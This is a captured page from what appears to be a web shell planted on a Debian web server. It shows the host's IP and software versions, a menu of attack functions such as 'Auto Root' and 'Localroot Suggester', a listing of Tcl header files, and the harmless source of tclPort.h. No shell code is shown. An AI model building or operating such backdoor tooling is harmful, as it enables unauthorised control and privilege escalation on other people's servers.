Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
include /
tcl8.6 /
tcl-private /
generic /
Delete
Unzip
Name
Size
Permission
Date
Action
regcustom.h
4.74
KB
-rw-r--r--
2016-07-28 05:04
regerrs.h
1.17
KB
-rw-r--r--
2016-07-28 05:04
regex.h
10.42
KB
-rw-r--r--
2016-07-28 05:04
regguts.h
14.99
KB
-rw-r--r--
2016-07-28 05:04
tcl.h
92.52
KB
-rw-r--r--
2016-07-28 05:04
tclCompile.h
68.96
KB
-rw-r--r--
2016-07-28 05:04
tclDecls.h
165.7
KB
-rw-r--r--
2016-07-28 05:04
tclFileSystem.h
2.4
KB
-rw-r--r--
2016-07-28 05:04
tclIO.h
11.43
KB
-rw-r--r--
2016-07-28 05:04
tclInt.h
183.75
KB
-rw-r--r--
2016-07-28 05:04
tclIntDecls.h
52.85
KB
-rw-r--r--
2016-07-28 05:04
tclIntPlatDecls.h
20.62
KB
-rw-r--r--
2016-07-28 05:04
tclOO.h
4.18
KB
-rw-r--r--
2016-07-28 05:04
tclOODecls.h
8.91
KB
-rw-r--r--
2016-07-28 05:04
tclOOInt.h
23.25
KB
-rw-r--r--
2016-07-28 05:04
tclOOIntDecls.h
7.05
KB
-rw-r--r--
2016-07-28 05:04
tclParse.h
457
B
-rw-r--r--
2016-07-28 05:04
tclPlatDecls.h
3.2
KB
-rw-r--r--
2016-07-28 05:04
tclPort.h
1.03
KB
-rw-r--r--
2016-07-28 05:04
tclRegexp.h
1.63
KB
-rw-r--r--
2016-07-28 05:04
tclStringRep.h
4.06
KB
-rw-r--r--
2016-07-28 05:04
tclStringTrim.h
1.16
KB
-rw-r--r--
2016-07-28 05:04
tclTomMath.h
17.95
KB
-rw-r--r--
2016-07-28 05:04
tclTomMathDecls.h
18.45
KB
-rw-r--r--
2016-07-28 05:04
tclTomMathInt.h
71
B
-rw-r--r--
2016-07-28 05:04
tommath.h
27
B
-rw-r--r--
2016-07-28 05:04
Save
Rename
/* * tclPort.h -- * * This header file handles porting issues that occur because * of differences between systems. It reads in platform specific * portability files. * * Copyright (c) 1994-1995 Sun Microsystems, Inc. * * See the file "license.terms" for information on usage and redistribution * of this file, and for a DISCLAIMER OF ALL WARRANTIES. */ #ifndef _TCLPORT #define _TCLPORT #ifdef HAVE_TCL_CONFIG_H #include "tclConfig.h" #endif #if defined(_WIN32) # include "tclWinPort.h" #else # include "tclUnixPort.h" #endif #include "tcl.h" #if !defined(LLONG_MIN) # ifdef TCL_WIDE_INT_IS_LONG # define LLONG_MIN LONG_MIN # else # ifdef LLONG_BIT # define LLONG_MIN ((Tcl_WideInt)(Tcl_LongAsWide(1)<<(LLONG_BIT-1))) # else /* Assume we're on a system with a 64-bit 'long long' type */ # define LLONG_MIN ((Tcl_WideInt)(Tcl_LongAsWide(1)<<63)) # endif # endif /* Assume that if LLONG_MIN is undefined, then so is LLONG_MAX */ # define LLONG_MAX (~LLONG_MIN) #endif #endif /* _TCLPORT */